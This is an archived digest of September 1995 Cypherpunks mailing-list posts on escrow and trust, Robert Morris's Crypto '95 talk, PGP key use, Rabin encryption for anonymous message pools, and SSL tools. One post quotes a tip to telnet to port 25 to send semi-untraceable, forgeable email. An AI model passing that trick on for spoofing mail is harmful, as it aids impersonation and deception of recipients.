Also, what's the status of PGP 3.0?

Thanks,

Rob



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Sat, 2 Sep 95 19:41:49 PDT
To: Dar Scott <dsc@swcp.com>
Subject: Re: Cyphernomicon, and a section on Escrow and Reputations
In-Reply-To: <v01510100ac6dcfd46ccc@[198.59.115.135]>
Message-ID: <Pine.SGI.3.91.950902194010.8460C-100000@Sequoia.picosof.com>
MIME-Version: 1.0
Content-Type: text/plain


On 2 Sep 1995, Dar Scott wrote:

> >I finished my first release, a megabyte-sized file done in MORE, a powerful
> >outline processor (which enabled me to maintain notes, make
> >cross-references, and generally manage such a huge writing project). I
> >released it last year, and put it in my anonymous ftp account at
> >ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom
> >is often very crowded, though.
> 
> After several tries I was not able to get this.  Has anyone made it
> available in an alternate location?

Tim mentioned that we're planning on spiffing up the cypherpunks web
site (including using a real web server) and the cyphernomicon is an
obvious candidate for inclusion - depending on how many people help out,
the new site (a quasi-mirror at first, till we get sameer/et al's
go-ahead) should be live within a couple weeks.

If you're interested in gathering documents, hacking HTML, or anything
else involved in creating/maintaining a web hierarchy, drop me a line.
The space/delivery of the documents we're providing for free, but I
don't have a budget to hire a staff to do things the "right way" (my way :)
for this project.

--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node)   edge@you.got.net 
                  "Shoot the Fruit Loop"               408.469.9400






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Sep 95 20:58:25 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: A problem with anonymity
Message-ID: <ac6e746b10021004dfaf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:38 AM 9/3/95, MONTY HARDER wrote:

>  But if the escrow agent is anonymous, we simply recurse, moving now to
>the question of whether anyone can trust the Anonymous Escrow Agency not
>to take the money and run.

Well, at one level, everything is always recursive.

But seriously, the reason it differs is that the escrow agents are in the
business to be escrow agents, not to take the money and run. This actually
works in the real world. (Game-theoretically, they get a certain payoff in
defecting, but then forego the revenue stream from future transactions....)

And, of course, it is possible to structure things so that the escrow agent
cannot "take the money and run," because the money is not accessible to
them.

This is analogous to an escrow agent in the real world holding a check from
Alice to Bob until Bob completes some set of conditions. The escrow
agent--call her Essie--cannot cash the check herself. She can of course
renege on the deal, even if Bob does his part of the bargain, but there is
little incentive for her to do so.

One can ask what payoffs and costs/benefits exist for various actions by
these agents, and game theory needs to take a look at these sorts of
transactions, but there are plenty of reasons to believe "convergence" will
occur (basically, that "effectively honest" behavior will be common).

>TC> (I mention banks because, when you look at it closely, today's banks can
>TC> quite easily claim that a customer made a withdrawal when he didn't. That
>TC> they don't says more about the nature of persistent businesses than about
>TC> any government oversight or security features. This is a side point, but it
>TC> bears keeping in mind that the real world of banks and businesses, etc., is
>TC> not fully secure, either. And yet it mostly works pretty well. The reasons
>TC> for this are interesting to consider.)
>
>  A bank has $$ invested in impressive-looking buildings, (so that
>vanishing into the ether and setting up shop elsewhere is rather
>difficult) and several officers whose TrueNames are registered with the
>appropriate agencies, so that they may be sued if they pull this
>crap.

No, my point was that it is fairly easy for any bank to scam any particular
customer, given the flaky nature of verification of withdrawals and other
transactions (at least for smallish amounts of money). Few banks check
signatures, few banks bother to demand much ID, etc.

The issue is not whether you can sue Bank of America, but whether you could win.

That banks don't often scam customers for small amounts of money is
testimony to the fact that they've got a better payoff matrix element in
being a bank than the meager payoff in scamming a few customers.

I submit this not as proof, but as evidence that the type of "convergence"
mentioned above mostly works. Most commerce hinges on this, not because of
law enforcement. Like True Names, the threat of law enforcement is only a
part of the overall equation.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 2 Sep 95 21:35:08 PDT
To: cypherpunks@toad.com
Subject: Crypto '95: Robert Morris
Message-ID: <199509030434.VAA24841@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


Bob Morris (recently retired from NSA) gave a fascinating invited lecture
entitled "Non-cryptographic Ways of Losing Information".  I hope he writes
it up; until then, here are my notes from his presentation.

Two things he said which I found new and fascinating:

- During the early 1950's many major powers were discouraged by the
  tendency of then-modern crypto machines to fail in a way that would send
  plaintext instead of ciphertext, and they went to one time pads for most
  of their high-level enciphered traffic.  Because of key re-use, we were
  regularly and routinely reading pieces of that traffic -- not just
  VENONA, but many systems from various countries.  Sometimes the people
  who prepared OTP's would double their profit by selling them to more
  than one customer.

- By the middle to late 1960's cryptanalysis became less cost effective
  than obtaining the information by other means -- wiretaps and so on.

Morris emphasized and said we should write down these dicta:
-------------------------------------------------------------------------
Never underestimate the attention, risk, money and time that an opponent
will put into reading traffic.

Rule 1 of cryptanalysis: check for plaintext.
-------------------------------------------------------------------------

The real start of modern cryptology should be dated to the Enigma
machines, which typified the new character of the art.  Much has been made
of the errors of the German cipher clerks, but egregious as they were, the
errors made by the British cryptographers were vastly worse, and the
American blunders were worse yet.  German analysts regularly read and used
Atlantic convoy orders throughout the war -- they were transmitted in an
old code.

One must always assume that the enemy has a copy of the machine/algorithm.
A system that relies on keeping the algorithm secret is eventually doomed
to failure, because it will always be discovered by some means or other.

He sees microphones and antennas everywhere: the telephone line cord is
an antenna; if telephone linemen were working on a pole outside his house
he'd call the police an then find out what they were working on.  In an
unspecified country he called Lower Slobbovia (Al Capp, isn't it?) American
troops used encrypted radiophones; when they broke they were taken to local
repair shops to be fixed.  When they got home the US engineers were
interested to see the modifications that had been made.  He mentioned a
few similar instances, including the lovely carved wooden seal given to
the US Embassy in Moscow to decorate their anteroom. [It's now on view at
the National Cryptologic Museum with the transmitter cavity visible.]
Cordless phones have a range of 5 miles or so.  Use of cellular phones is
increasing dramatically, as well as fax and modems.

He discussed the Walker/Whitworth spying case, and said one of his design
criteria is to design systems with Walker in them: it's not good enough to
have a system where everyone must be trusted, but it must also be made
robust against insiders.  This may include going to non-paper systems, so
that there are no paper keys that the Walkers of the world can shop to the
other side.

Threats and risks include: overconfidence, carelessness, eavesdropping and
tapping, theft of floppies and other materials, purchase, theft of key
material, burglary and blackmail.  Much or most loss is due to insiders.

In the future there will be more radio used for ordinary communications.
Americans are unwilling to pay for secure telephones, but that's not the
case in Europe.

-------------------------------------------------------------------------
Reported by:

	Jim Gillogly
	12 Halimath S.R. 1995, 04:33





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sat, 2 Sep 95 20:43:40 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <8B05513.00030003DB.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


BS> For the problem that started this discussion, though, there's no good solution.
BS> Since the Bad Guys _can_ encrypt a message to you with your signature key,
BS> and send it to you by anonymous remailer, they can plant a reason to suspect
BS> that you may have evidence encrypted with that key.

  You've got it backwards. The problem that I originally posited was a
corrupt key escrow agent using my signature key to forge a document. The
fact that my signature pubkey could be used to encrypt messages to me is
not particularly relevant. My employer could set up filters to keep me
from recieving email on company time that is not encrypted to a key that
the corporate escrow authority has in its possession.  NBD.

  My concern here is with the NGACK situation. Companies have valid
reasons to want escrow for their own purposes. I'm just warning people
not to accept a signature key being escrowed by =anyone=. When you
create a key to be escrowed, make sure the userid includes something
like [Not Valid For Signatures].


 * Pro Choice on Abortion.
 * No choice on Education.
 * Huh?
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sat, 2 Sep 95 20:43:42 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: A problem with anonymity
Message-ID: <8B05513.00030003DC.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


TC> Oh, I agree, of course. Except that the escrow agent need not be a
TC> "nonymous" agent, to use Monty's terminology here.

  Sorry, my Greek is rusty.  Shoulda been "onymous", I suppose.

  But if the escrow agent is anonymous, we simply recurse, moving now to
the question of whether anyone can trust the Anonymous Escrow Agency not
to take the money and run.

TC> (I mention banks because, when you look at it closely, today's banks can
TC> quite easily claim that a customer made a withdrawal when he didn't. That
TC> they don't says more about the nature of persistent businesses than about
TC> any government oversight or security features. This is a side point, but it
TC> bears keeping in mind that the real world of banks and businesses, etc., is
TC> not fully secure, either. And yet it mostly works pretty well. The reasons
TC> for this are interesting to consider.)

  A bank has $$ invested in impressive-looking buildings, (so that
vanishing into the ether and setting up shop elsewhere is rather
difficult) and several officers whose TrueNames are registered with the
appropriate agencies, so that they may be sued if they pull this
crap.

  While individual stockholders might appreciate the anonymity (and
protection from legal action) of owning stock in a bank or escrow agency
(might just combine the functions, while we're at it), they demand
onymity of the officers with whom they entrust the keys to the
corporation.




 *    
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Sat, 2 Sep 95 18:58:20 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: Basic Public key algorithms.
In-Reply-To: <199509030031.UAA29612@frankenstein.piermont.com>
Message-ID: <Pine.A32.3.91.950902215716.16072A-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Sep 1995, Perry E. Metzger wrote:

> > > No, because one patent covers public key cryptography itself, and not
> > > a particular method.
> > 
> > Point of information--I'm not flaming you Perry, but Public Key Partners 
> > claims that their patent covers all forms of Public Key Crypto.
> 
> How is this at all different from what I just said?

It isn't.  I just misread what you wrote.

Mea culpa.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  
PGP encrypted mail welcomed--finger samman@cs.yale.edu for public key


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMEkLmL5ALmeTVXAJAQHotAL/bW9tN3Lf+9ATx8ks0s8kz8O3zTikverx
y9bJfsQRaoDtJkNmeiFPBSCIl9q27OIdpN4tyExmFztJVgEdxRYcqZ19ZcXVDRpI
B//GwQQ45JXl1ZKurT0cr2poIecCAFuE
=/0J/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Sat, 2 Sep 95 22:00:36 PDT
To: cypherpunks@toad.com
Subject: Cyphernomicon
Message-ID: <v01510103ac6ed8b35fa2@[198.59.115.136]>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to all who helped me get my hands on Cyphernomicon.

I now can breeze through the html site at www.oberlin.edu.  I guess at 2am
it didn't work because either I or oberlin were too sleepy.  I still cannot
open an FTP port at netcom.

I got a copy on my Mac by giving a lot of memory to Netscape and getting it
from www.swiss.ai.mit.edu.  I also got a copy from Jeff's zipped copy at
ftp.goblin.punk.net, but my unzipping utility hacked out a few lines.

Here is a summary of what I learned:

  Cyphernomicon
  File Size:  1,287,731 (single character newlines)

  FTP sites:

     ftp.netcom.com/pub/tc/tcmay/CP-FAQ
     The original.  "crowded"  (I couldn't open an FTP port.)

     ftp.goblin.punk.net/pub/docs/cypherpunk.faq.gz
     ftp.goblin.punk.net/pub/docs/cypherfq.zip
     28.8 bps modem, newline=CR, but .zip will change to newline=CRLF
     About 432Kbytes.
     (On PPP@14.4 it took me 6+ minutes to get it.)
     "until someone posts it on a site with higher bandwidth"

     [the upcoming new/changed/mirrored Cypherpunk site]

  HTML site:

     http://www.oberlin.edu/~brchkind/cyphernomicon/
     nice.

  Other http: sites:

     http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ
     text.  very responsive and fast (6 minutes for my 14.4 connection).

     http:/www.isse.gmu.edu/~pfarrell/crypto/CP-FAQ
     text

     http://www.msen.com/~lwp/Cyphernomicon.gz
     About 432Kbytes.  Need g[un]zip utility.

Clearly missing are credits and contact info.

I probably won't get to the FAQ much this weekend (wife & kids expect me to
do my share and bring home the bacon), but maybe in a week or two.  Do I
have to read the sci.crypt FAQ, too, to earn my FAQ badge?

Dar
(list newbie)



===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790  <---
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files are in this order:
AOL, Mime, Binhex4, PGP, UUencode
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 3 Sep 95 01:45:44 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <8B0556B.00030003E0.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


RA> separate step/pass) Encrypt the Signed Message (IOW is E+S just a short cut
RA> for the two processes done in sequence using the same key for both

  The only way that -es uses the same key for both the encryption and
signature is if I have EncryptToSelf turned on, or I explicity specify
my signature key as one of the recipients. My privkey is used for the
signature, but =your= pubkey is used for the encryption.



 * A dork with a modem can become a dork with a modem and an Internet address.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Sat, 2 Sep 95 14:45:23 PDT
To: cypherpunks@toad.com
Subject: Re: anyone know what this "top secret" code does?Re: anyone know what this "top secret" code does?
In-Reply-To: <40odtn$1md@teal.csn.net>
Message-ID: <199509022145.XAA02299@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


hallam@zorch.w3.org (Phillip M. Hallam-Baker) wrote:

> The code looks more than a casual hoax.  Its not Skipjack, but that
> does not mean its not NSA originated.  Its probable that many of the
> people who designed skipjack don't know its skipjack.  If you read
> the code carefully it is obvious why its not skipjack, an S2
> algorithm is referenced explicitly.

[...]

> Regardless about whether or not it is skipjack it challenges one of
> the basic assumptions of many cipher designers, namely that the
> amount of diffussion should be maximized at each round.  I am now
> very much less than convinced that this is in fact an issue.  The S1
> design with its narrow diffussion provides very strong guarantees
> that one round cannot undo the work of the previous one.

> S1 must therefore be considered to be a significant contribution to
> the cryptographic community. It has challenged a fundamental tenet of
> faith which has so far been accepted without argument. It is thus
> paradigmatic in that it may lead to a new method of cipher design.

Does anyone remember the scenario someone suggested awhile back that
hypothesized a scheme by the NSA or other TLAs to encourage the use
of WEAK crypto?  It involved spreading a lot of F.U.D. about PGP and
other strong crypto methods, followed by the discovery/leak of a
supposedly "strong" crypto algorithm to replace it.

This may not be it.  It may just be a trial balloon to gauge the
reaction of the crypto community to an anonymous, "gift from heaven"
crypto algorithm.  But at least be aware of what COULD happen.

One tactic that might be tried is an intentional "leak", followed by
a flurry of legal actions designed to make it look like the "leak"
was going to cause some real damage to their cryptanalysis efforts,
due to it being "unbreakable", or whatever.  Of course, anything
"leaked" would be crippled in some undetectable manner so as to
provide a back door...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Sat, 2 Sep 95 22:49:23 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <v01510104ac6eec5efe93@[198.59.115.136]>
MIME-Version: 1.0
Content-Type: text/plain


Having not read the FAQ, I foolishly jump in...

Timothy May wrote,
>At 2:38 AM 9/3/95, MONTY HARDER wrote:
>
>>  But if the escrow agent is anonymous, we simply recurse, moving now to
>>the question of whether anyone can trust the Anonymous Escrow Agency not
>>to take the money and run.
>
>Well, at one level, everything is always recursive.
[snip]
>And, of course, it is possible to structure things so that the escrow agent
>cannot "take the money and run," because the money is not accessible to
>them.
>
>This is analogous to an escrow agent in the real world holding a check from
>Alice to Bob until Bob completes some set of conditions. The escrow
>agent--call her Essie--cannot cash the check herself. She can of course
>renege on the deal, even if Bob does his part of the bargain, but there is
>little incentive for her to do so.

For example, the money exchanger or bank can allow an exchange option that
packages up the new money for some AND/OR list of package openers, certify
what it is and then seal it up & send it to the escrow agent.  As mentioned
by Timothy and Monty this just pushes the question down to whether anyone
can trust the bank.  Timothy claims evidence that there will be entities
such as banks that do not scam customers.

I observe that from a few trusted entities a great amount of trust can be
created--bubbling up that same recursion.  In the above example, the trust
of the Anonymous Escrow Agency is increased by the mechanism that does not
allow the agency to get at the cash.  This uses the trust of the bank, but
does not decrease the trust of the bank.

Perhaps trust formal transfer mechanisms can evolve so that almost
everybody can become almost as trustworthy as the most trustworthy entity
in the commerce.

Dar
(who knows he should have checked the FAQ)


===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790  <---
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files are in this order:
AOL, Mime, Binhex4, PGP, UUencode
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Sun, 3 Sep 95 00:06:05 PDT
To: cypherpunks@toad.com
Subject: Mailing List Archive
Message-ID: <Pine.SGI.3.91.950903000118.15454B-100000@Sequoia.picosof.com>
MIME-Version: 1.0
Content-Type: text/plain



For personal reasons (my dislike for big mailboxes) I've set up 
hypermail to archive the Cypherpunks list at:

http://got.net/CypherpunksArchive/

If someone else has done this, I'll stop fiddling with the configs and 
come use yours.

I just set it up, so it's rather empty today... If someone has a 
non-html archive of the messages, I'm up to tossing some perl around and 
converting it for the archive.

--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node)   edge@you.got.net 
                  "Shoot the Fruit Loop"               408.469.9400






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Sun, 3 Sep 95 00:18:05 PDT
To: cypherpunks@toad.com
Subject: Re: Mailing List Archive
In-Reply-To: <Pine.SGI.3.91.950903000118.15454B-100000@Sequoia.picosof.com>
Message-ID: <Pine.SGI.3.91.950903001558.15750A-100000@Sequoia.picosof.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Sep 1995, Jay Campbell wrote:

> For personal reasons (my dislike for big mailboxes) I've set up 
> hypermail to archive the Cypherpunks list at:
> 
> http://got.net/CypherpunksArchive/

Oops - the real (but temporary) URL is actually:

http://got.net:8080/CypherpunksArchive/

--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node)   edge@you.got.net 
                  "Shoot the Fruit Loop"               408.469.9400






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Sun, 3 Sep 95 01:43:06 PDT
To: cypherpunks@toad.com
Subject: SSLRef (SSLtelnet)
Message-ID: <199509030845.CAA00124@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have been looking at a number of SSLTelnet/FTP programs (available from
utopia.hacktic.nl by the way) and they would seem to all require Netscape's
library. Anyone know about this?

I found the following link for SSLRef but I was just wondering if it
was the only way to implement SSL telnet&ftp. I would hate to see
people not be able to use them simply because there's no illegal copies
available. 

  URL: http://home.netscape.com/info/sslref.html

If anyone knows of any clones or foreign sources please speak up.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMElX4cLa+QKZS485AQERIQL/SBZAOAdAWSzfl/W9GNfDEU7e+3pBua5s
z84iGGuT5CfCGM4X5rYGKV4DuRVfFPyNQc++bn8SpPgyenbvBK+gc6400FHVskr3
Y4HAlBTqSSoyfOUHlhnEAs63nsjDGdFM
=ihYg
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

PS: my failure to lament violations of ITAR should not be confused with
actual involvment in criminal activity. Heh heh heh. Catchyalater




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cybie@cris.com
Date: Sun, 3 Sep 95 02:07:59 PDT
To: loki@obscura.com (Lance Cottrell)
Subject: Re: Direct Socket to Remailer?
In-Reply-To: <ac6da5d1010210040573@[137.110.24.250]>
Message-ID: <9509030907.AA04231@mariner.cris.com>
MIME-Version: 1.0
Content-Type: text


> 
> At 7:25 PM 9/1/95, ROBO Mixmaster Remailer wrote:
> >I've heard of telnetting to port 25 to send SEMI-untraceable e-mail.
> >The procedure, quite frankly, sounds rather complicated.
> >
> 
> You should try the telnet port 25 trick. It is amazingly simple (but not
> secure). Just "telnet some.machine.com 25" and type help. It will guide you
> through it. It is quite informative.
> 
>         -Lance

Before you do it, make sure your ISP doesn't mind you telneting to port 25.
VCU's computer dept. doesn't take to kindly to it.  They're worried about 
people sending forged e-mail.  (I was tempted to tell the guy when I got 
caught doing it that they should put a copy of PGP online for folks to use.
But I just wanted my account re-instated.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 3 Sep 95 08:25:23 PDT
To: cypherpunks@toad.com
Subject: PEE_per
Message-ID: <199509031244.IAA20069@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-3-95. NYPaper:


   "500,000 Clients, No Branches. Phone Banking Is Catching
   On."

      Bankers from around the world are making the pilgrimage
      to Leeds in the north of England for a miracle cure at
      their stagnant industry's equivalent of a Lourdes. Here
      is First Direct, a bank with half a million customers
      and not a single branch. It is the world's leading
      telephone-only bank; it is the fastest-growing bank in
      Britain. On the walls are sports stadium scoreboards,
      constantly flashing the number of customers on hold and
      how long they have been waiting. While a banker serves
      a customer, his computer screen is displaying all sorts
      of personal information about her. "No Adverse Risk"
      flashes at the top, indicating that the bank would be
      glad to loan her money. Also displayed is the fact that
      she is a 30-year-old single renter with a job as a
      project manager, along with a list of all the bank's
      prior contacts with her.



   PEE_per











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hfinney@shell.portal.com
Date: Sun, 3 Sep 95 08:18:22 PDT
To: cypherpunks@toad.com
Subject: Slightly faster checking for encrypted messages to me
Message-ID: <199509031517.IAA26595@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


One idea we have often discussed is to use a public message pool such
as a newsgroup or mailing list reflector as a means of receiving
messages anonymously.  Each message would be encrypted with my public
key (or that of my pseudonym), but with the identifying information
stripped.  Then I need to scan them all to see which ones are encrypted
to me.  Those are the ones which decrypt under the public key system to
a correctly padded session key.  Doing it this way eavesdroppers can't
even tell how much mail my nym is receiving.

The problem is that doing a PK decrypt is time consuming, and if we had
to do it to all the anonymous mail traffic in the world it could become
impractical.

I had hoped that Shamir's idea which I posted earlier would help with
this, but I can't see an application.  His idea helps to check for
specific signatures, which is a thing anyone can do, but he lets you do
it faster.  We need a faster way to do a check which only the holder of
the secret key can do.

I have thought of a small improvement based on Shamir's ideas, though.
Use Rabin encryption rather than RSA.  In this system the decryption
involves taking square roots.  This is done by taking the square root of
the ciphertext mod p and q (the two secret primes) and using the Chinese
Remainder Theorem to get the square root mod n.  (This is also done in
RSA with eth roots.)

If p and q are 3 mod 4, you can get the square root of x mod p as x^((p+1)/4)
mod p.  This is done for p and q and you then combine them.  So the
amount of work is pretty much the same as for RSA.

However a speedup is possible to do a quicker check for a validly formed
encrypted message.  The idea is that the encrypted message is of the form
M^2 mod n.  This means that it is a quadratic residue mod n, and also
therefore a q.r. mod p and q.  So the speedup is simply to check whether
it is a q.r. mod one of the primes and to reject it if not.  This takes
about half the amount of time to actually try the decryption.

All valid messages will pass the test, and half of the invalid messages
will be rejected.  So this is not very strong, but it is perhaps better
than nothing.  Maybe Shamir will come up with some idea for this
problem.

As I wrote before, testing for a q.r. is done by raising to the (p-1)/2
power mod p, and seeing if the answer is 1.  I think this can be done
in such a way that if it does come out to be 1 we can use our
intermediate results to calculate the (p+1)/4 needed for the square
root very quickly.

Also, BTW Rabin encryption is not specifically patented, only the
relatively-untested and almost-expired patent which covers all public
key systems (with the failed knapsack algorithm as its specific
embodiment) would supposedly prevent its use.  However even PKP is
apparently becoming more reluctant to throw its weight around on this
patent, while they are still quite possessive about RSA.  So perhaps a
migration to Rabin is in order.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 3 Sep 95 08:19:46 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto '95: Robert Morris
Message-ID: <v02120d0fac6f841f967c@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 9/3/95, Name Withheld by Request wrote:
>So Robert Morris worked for NSA.
>Does that mean that the infamous 1988 Internet Worm
>was part of a NSA-sponsored intelligence-gathering mission?

The worm was relased by his son.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 3 Sep 95 08:19:49 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <v02120d11ac6f852cd5d8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:53 9/3/95, David R. Conrad wrote:

>Obviously, but I think many people would resist it if they collect it just
>for the sake of collecting it.  But if they say they are collecting it to
>put on the license in order to verify licenses "in the field", then the
>collection will be a lot more palatable to a lot more people.
>
>Have people in CA complained much that they collect it when you get the
>license?

The masses never complain. Fingerprints on driver licenses, pictures on
credit cards, and the soon to be mandatory medical monitoring devices that
continually check your bloodstream for toxins are for _your_ protection.

People demand more, not less, supervision. The government will gladly oblige.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 3 Sep 95 05:35:15 PDT
To: cypherpunks@toad.com
Subject: 260_xxx
Message-ID: <199509031235.IAA19851@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-3-95. NYPaper:


   "It's a Hacker Meeting, So Hide Your Phones."

      Razor and Curious George showed up. Angstrom and
      Tigerboy and Cameo came, Rebel and Master Chemist, and
      the revered Emmanuel Goldstein. And there were dozens
      more, the illicit apparatus for filching pay-phone calls
      secreted deep in the pockets of shredded jeans, the
      hand-held Newton minicomputers at the ready. It was a
      time for all prudent people to hide their cellular
      phones and guard their calling cards, and for those who
      despise Nynex, Bell Atlantic and AT&T to rejoice.
      Because the electronic virtuosos in the public lobby of
      the Citicorp building at 53d Street and Lexington Avenue
      were networking to share clever and highly illegal ways
      of fooling the phone system and the corporate computer
      guard dogs meant to keep them out.


   260_xxx












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 3 Sep 95 05:38:29 PDT
To: cypherpunks@toad.com
Subject: ARS_tug
Message-ID: <199509031238.IAA19949@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-3-95. NYPaper:


   "Aircraft Carrier May Give Way To Missile Ship."

      The aircraft carrier may soon be shoved off center stage
      by a new "arsenal ship" that would be able to rain 500
      missiles within a matter of minutes on targets hundreds
      of miles away, without risking pilots' lives. A carrier
      costs $4.5 billion to build and $440 million a year to
      operate. The new ship, essentially a floating missile
      barge, might cost only $500 million and just tens of
      millions a year to run. The new ship would fire Tomahawk
      cruise missiles, long-range artillery shells or rocket
      barrages against ammunition dumps, command posts and
      artillery. It could prove particularly valuable in the
      early stages of a crisis, before ground troops were in
      place. It would travel with other ships and submarines
      for protection, and target information would be provided
      by other vessels, reconnaissance aircraft, pilotless
      drones or ground spotters. The 825-foot ship might
      require fewer than 20 people to operate, compared with
      the 5,000 aboard a 1,040-foot carrier.


   ARS_tug











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sun, 3 Sep 95 08:25:01 PDT
To: lyalc@ozemail.com.au (lyal collins)
Subject: Re: A bold ssl idea ?
In-Reply-To: <199509031145.VAA12843@oznet02.ozemail.com.au>
Message-ID: <"swan.cl.cam.:180200:950903143250"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> I understand that setting up RC4 keys is slower that testing for the correct
> key (I may have misuderstood this bit).

For pure RC4, Yes.  However, SSL is not pure RC4.

> Is it considered practical to modify the brutessl code to have multiple
> message data, and test each against a key from allocated key space ?

You are the third person I've heard think of this.
[ The first did quite a lot of calculations before spotting the problem ! ]

> If so, this may mean that perhaps 3 message can be tested against a single
